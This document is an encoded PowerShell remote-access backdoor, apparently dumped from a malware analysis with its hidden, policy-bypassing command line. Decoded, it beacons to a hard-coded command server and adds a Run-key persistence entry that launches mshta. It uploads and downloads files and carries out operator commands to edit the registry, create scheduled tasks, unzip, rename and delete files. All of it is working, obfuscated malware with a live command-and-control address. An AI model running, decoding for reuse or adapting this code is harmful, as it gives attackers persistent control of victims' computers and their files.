ALQBkAGQAXwBIAEgAXwBtAG0AXwBzAHMAOwAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABuAG8AdwB0AGkAbQBlACAAKwAgACcAXwBmAGkAbABlACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAG8AdwBuADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AGgAVQBiAFUAVwBrAFoAYgBYACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAGcAZQBkAGkAdAA6ACcAKQApAHsAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAPQAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA4ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ATgBhAG0AZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AIAAtAFYAYQBsAHUAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7ACQATgBBAEQAcABkAG8ARwBRAEQAQgBvACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAZgBwAEIAYgAgACQAeQB5AFYARwBQAGgAQgBMAFkAcABxAEUAegBGACAAJABOAEEARABwAGQAbwBHAFEARABCAG8AOwB9AH0AaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AQwBvAG4AdABhAGkAbgBzACgAJwB0AGEAcwBrADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7ACQAQQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQA7ACQAUwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAOwAkAHQAcgBpAGcAZwBlAHIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAE8AbgBjAGUAIAAtAEEAdAAgACgARwBlAHQALQBEAGEAdABlACkAIAAtAFIAZQBwAGUAdABpAHQAaQBvAG4ASQBuAHQAZQByAHYAYQBsACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAE0AaQBuAHUAdABlAHMAIAAxADAAKQA7ACQAVABhAHMAawAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAJABBAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVAByAGkAZwBnAGUAcgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTAGUAdAB0AGkAbgBnAHMAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAFQAYQBzAGsAOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAegBpAHAAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAG4AYQBtAGUAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANwApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZABlAGwAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACkAewBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA7ACQATgBBAEQAcABkAG8ARwBRAEQAQgBvACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAZgBwAEIAYgAgACQAeQB5AFYARwBQAGgAQgBMAFkAcABxAEUAegBGACAAJABOAEEARABwAGQAbwBHAFEARABCAG8AOwB9AH0AfQB9AH0AIABDAGEAdABjAGgAewB9AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADcAOwB9AHcAaABpAGwAZQAoACQAdAByAHUAZQAgAC0AZQBxACAAJAB0AHIAdQBlACkA

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA0ADsAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAAgAD0AIAAxADAAMgA0ACAAKgAgADEAMAAyADQAOwAkAEUAVgBQACAAPQAgACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAgACsAIAAnAC0AJwAgACsAIAAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFADsAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAA9ACAAJwBoAHQAdABwADoALwAvADEANwAyAC4AOQAzAC4AMQA4ADEALgAyADQAOQAvAGMAbwBuAHQAcgBvAGwALwBjAG8AbQAuAHAAaABwACcAIAArACAAJwA/AFUAPQAnACAAKwAgACQARQBWAFAAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcAEMATABQAFQATQBkAEcAdgBpAE8ASABmAFQATAAnADsAaQBmACAAKAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAKQApACAAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAtAE4AYQBtAGUAIABKAFEAUQB3AEUAIAAtAFYAYQBsAHUAZQAgACcAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABQAG8AdwBlAHIAUwBoAGUAbABsAC4AZQB4AGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBlAHAAIABiAHkAcABhAHMAcwAgAHAAaQBuAGcAIAAtAG4AIAAxACAALQB3ACAANAA3ADQANAA2ADUAIAAyAC4AMgAuADIALgAyACAAfAB8ACAAbQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADcAMgAuADkAMwAuADEAOAAxAC4AMgA0ADkALwBjAG8AbgB0AHIAbwBsAC8AaAB0AG0AbAAvADEALgBoAHQAbQBsACcAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7AH0AZgB1AG4AYwB0AGkAbwBuACAAZgBwAEIAYgAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJABsAG8AbwBBAE0ASQBtAEkASwApAHsAJABUAEEAQwBLAHMAWABWAE4AcwBTACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGwAbwBvAEEATQBJAG0ASQBLACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEMAbwBuAHQAZQBuAHQATABlAG4AZwB0AGgAIAA9ACAAJABUAEEAQwBLAHMAWABWAE4AcwBTAC4ATABlAG4AZwB0AGgAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAFQAQQBDAEsAcwBYAFYATgBzAFMALAAgADAALAAgACQAVABBAEMASwBzAFgAVgBOAHMAUwAuAEwAZQBuAGcAdABoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEYAbAB1AHMAaAAoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJAB3AEQAeQBlAGIAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAEgATgB0AFUAZABGAFgAZABqAG0AUABnAFQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAdwBEAHkAZQBiAFUALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQBMAFQAIAA9ACAAJABIAE4AdABVAGQARgBYAGQAagBtAFAAZwBUAGIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwByAGUAdAB1AHIAbgAgACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAEwAVAA7AH0AZgB1AG4AYwB0AGkAbwBuACAAdgBTAGwAbwBiAFYAbAAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJAByAE8AdQBNAEYALAAgACQARABiAEMALAAgACQAeABQAGIAdwBqAHQAUwBhAHAAVABJAEIAKQB7ACQAVABpAG0AZQBvAHUAdAA9ADEAMAAwADAAMAAwADAAMAA7ACQAQwBSAEwARgAgAD0AIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAwAEQAKQAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAwAEEAKQA7ACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgAD0AIAAnAC0ALQAnADsAJABCAG8AdQBuAGQAYQByAHkAIAA9ACAAJwAqACoAKgAqACoAJwA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBSAGUAYQBkACgAJAByAE8AdQBNAEYAKQA7ACQAQwBWAFIAcQB3AHUAZgBBAGQAQwBOAHEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAA7AHcAaABpAGwAZQAoACAAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQwBWAFIAcQB3AHUAZgBBAGQAQwBOAHEALAAwACwAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAApACkAewBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAFQAaQBtAGUAbwB1AHQAIAA9ACAAJABUAGkAbQBlAG8AdQB0ADsAJABnAFIATABRAGEAdABHAG8AaQBpAGYAZABVAFQALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBtAHUAbAB0AGkAcABhAHIAdAAvAGYAbwByAG0ALQBkAGEAdABhADsAYgBvAHUAbgBkAGEAcgB5AD0AJwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVACAAPQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkAOwAkAGgAZQBhAGQAaQBuAGcAMQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAKwAgACQAQgBvAHUAbgBkAGEAcgB5ACAAKwAgACQAQwBSAEwARgApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMQAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADEALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAQwBvAG4AdABlAG4AdAAtAEQAaQBzAHAAbwBzAGkAdABpAG8AbgA6ACAAZgBvAHIAbQAtAGQAYQB0AGEAOwAgAG4AYQBtAGUAPQAnACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADIAMgApACAAKwAgACQARABiAEMAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJAB4AFAAYgB3AGoAdABTAGEAcABUAEkAQgAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAyADIAKQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADIALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAyAC4ATABlAG4AZwB0AGgAKQA7ACQAaABlAGEAZABpAG4AZwAzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAEMAUgBMAEYAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADMALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAzAC4ATABlAG4AZwB0AGgAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABDAFYAUgBxAHcAdQBmAEEAZABDAE4AcQAsACAAMAAsACAAJABiAHkAdABlAHMAUgBlAGEAZAApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAArACAAJABDAFIATABGACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwA0ACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcANAAuAEwAZQBuAGcAdABoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEYAbAB1AHMAaAAoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJAB3AEQAeQBlAGIAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAEgATgB0AFUAZABGAFgAZABqAG0AUABnAFQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAdwBEAHkAZQBiAFUALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQBMAFQAIAA9ACAAJABIAE4AdABVAGQARgBYAGQAagBtAFAAZwBUAGIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9ACQAcwB0AHIAZQBhAG0ALgBDAGwAbwBzAGUAKAApADsAfQBmAHUAbgBjAHQAaQBvAG4AIABoAFUAYgBVAFcAawBaAGIAWAAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJAByAE8AdQBNAEYAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABSAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAUgBlAHEAdQBlAHMAdAAuAHMAZQB0AF8AVABpAG0AZQBvAHUAdAAoADEANQAwADAAMAApADsAJABSAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABSAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAUwBwAGwAaQB0AFMAaQB6AGUAIAA9ACAAMQAwADIANAA7ACQAQgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAQgB5AHQAZQBbAF0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABTAHAAbABpAHQAUwBpAHoAZQA7AFQAcgB5ACAAewBEAG8AIAB7ACQAQwBvAHUAbgB0ACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAKQA7ACQAbwBmAGYAcwBlAHQAIAA9ACAAJABDAG8AdQBuAHQAIAAtACAAMQA7AEEAZABkAC0AQwBvAG4AdABlAG4AdAAgACQAcgBPAHUATQBGACAAJABCAHUAZgBmAGUAcgBbADAALgAuACQAbwBmAGYAcwBlAHQAXQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQgB5AHQAZQA7AH0AIABVAG4AdABpAGwAKAAkAEMAbwB1AG4AdAAgAC0AZQBxACAAMAApAH0AIABDAGEAdABjAGgAIAB7AH0AIABGAGkAbgBhAGwAbAB